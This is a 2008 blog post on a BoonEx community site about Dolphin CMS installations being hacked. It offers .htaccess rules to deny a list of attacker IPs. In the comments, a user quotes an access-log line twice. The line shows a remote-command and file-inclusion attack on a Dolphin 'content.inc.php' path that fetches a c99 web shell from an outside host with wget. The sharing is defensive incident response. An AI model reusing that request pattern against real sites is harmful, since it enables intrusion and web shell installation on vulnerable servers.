HomeUnityBlogs
 
 
praveenkv1988

Dolphin Security Issues :(

Today I happened to check a site that used dolphin and was hacked. I have found that they have deleted all the files from it and uploaded a script that fetch the contacts from orkut.com and sends the mail with a virus link (I am not posting that link here as that may be used by someone).

I have found those dolphin security issues that helped them to hack the sites. Currently I am in the process to develop the patch to fix all these issues. I know I will succeed in this.

I have checked that site and found many IPs that were used to hack the sites. I need to provide those IPs to all to block those IPs in your server.

To block these IPs in your host,

Open the file ".htaccess"

In the very beginning of it add the following.


<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 72.37.237.58
deny from 209.147.127.217
deny from 64.106.212.3
deny from 207.249.0.39
deny from 61.100.0.185
deny from 75.102.21.29
deny from 82.165.253.62
deny from 212.122.200.198
deny from 61.222.167.139
deny from 204.2.183.2
deny from 62.65.159.212
deny from 61.152.188.244
deny from 66.98.214.4
deny from 216.180.239.124
deny from 209.147.127.216
deny from 216.17.101.237
deny from 74.52.133.2
deny from 89.108.67.119
deny from 67.228.37.156
deny from 195.70.36.107
deny from 85.235.153.11
deny from 202.164.225.11
deny from 70.85.102.132
deny from 66.218.77.68
deny from 203.146.102.38
deny from 72.9.246.154
deny from 66.113.100.51
deny from 79.180.146.69
deny from 193.34.16.75
deny from 72.36.159.108
deny from 216.127.94.127
deny from 83.170.74.164
deny from 213.186.38.21
deny from 207.210.91.2
deny from 67.228.181.76
deny from 202.221.143.111
deny from 64.15.136.210
deny from 203.157.185.8
deny from 200.149.77.40
deny from 217.172.29.12

Regards,

Praveen

bad
2
good
 
 

Comments

sammie
sammie 128 days agocomment permalink
  
strange because i checked a hack site too and the logs show the install of the viruses and Trojans and they all came from the following ip's some where logged on at the same time, 2-3-4-5 of them at the same time.

125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute HTTP/1.1" 200 5 "http://www.DOLPHIN_SITE.com//ray/modules/global/inc/content.inc.php?sIncPath=http://xakforum.*****.ru/tmp_upload/files/c99shell.txt?"

125.160.130.62
125.161.175.176
125.161.242.63
125.162.0.113
125.162.100.238
125.162.119.8
125.162.120.4
125.162.120.71
125.162.123.243
125.162.245.116
125.162.250.166
125.162.255.114
125.162.255.151
125.162.255.25
125.162.40.85
125.162.41.197
125.162.44.29
125.162.81.235
125.162.88.121
125.163.211.4
125.163.222.124
125.163.250.47
125.163.79.69
125.163.81.129
125.163.85.158
125.164.129.76
125.164.205.204
125.164.213.29
125.164.238.186
125.164.238.40
125.164.78.44
125.164.78.68
125.164.94.102
125.165.106.115
125.165.4.201
125.165.6.130
125.165.62.30
125.167.242.86
125.167.254.125
 
bad
2
good
 
 
sammie
sammie 128 days agocomment permalink
  
strange because i checked a hack site too and the logs show the install of the viruses and Trojans and they all came from the following ip's some where logged on at the same time, 2-3-4-5 of them at the same time.

yet you dont list one of the following ip's

125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute HTTP/1.1" 200 5 "http://www.DOLPHIN_SITE.com//ray/modules/global/inc/content.inc.php?sIncPath=http://xakforum.*****.ru/tmp_upload/files/c99shell.txt?"

125.160.130.62
125.161.175.176
125.161.242.63
125.162.0.113
125.162.100.238
125.162.119.8
125.162.120.4
125.162.120.71
125.162.123.243
125.162.245.116
125.162.250.166
125.162.255.114
125.162.255.151
125.162.255.25
125.162.40.85
125.162.41.197
125.162.44.29
125.162.81.235
125.162.88.121
125.163.211.4
125.163.222.124
125.163.250.47
125.163.79.69
125.163.81.129
125.163.85.158
125.164.129.76
125.164.205.204
125.164.213.29
125.164.238.186
125.164.238.40
125.164.78.44
125.164.78.68
125.164.94.102
125.165.106.115
125.165.4.201
125.165.6.130
125.165.62.30
125.167.242.86
125.167.254.125
 
bad
1
good
 
 
DoLaugh
DoLaugh 127 days agocomment permalink
  
Praveenkv....what kind of security pack are you offering? Will this work for me since I cannot use .htaccess files and my global setting is set to ON?
 
bad
1
good
 
View 1 replies to this comment
 


Post a Comment

Please login to post a comment.

This Post
 
 
praveenkv1988 Blog
All Blogs
Found a bug? Have a suggestion? We really value your feedback!
 
 
Home  Products  Unity  Trac  About  Help  Contact  Privacy Policy  Terms of Use  Rules  RSS Feed  Blog
© 2008 BoonEx Ltd
ABN 27 127 966 581
 
PET:0.433825016022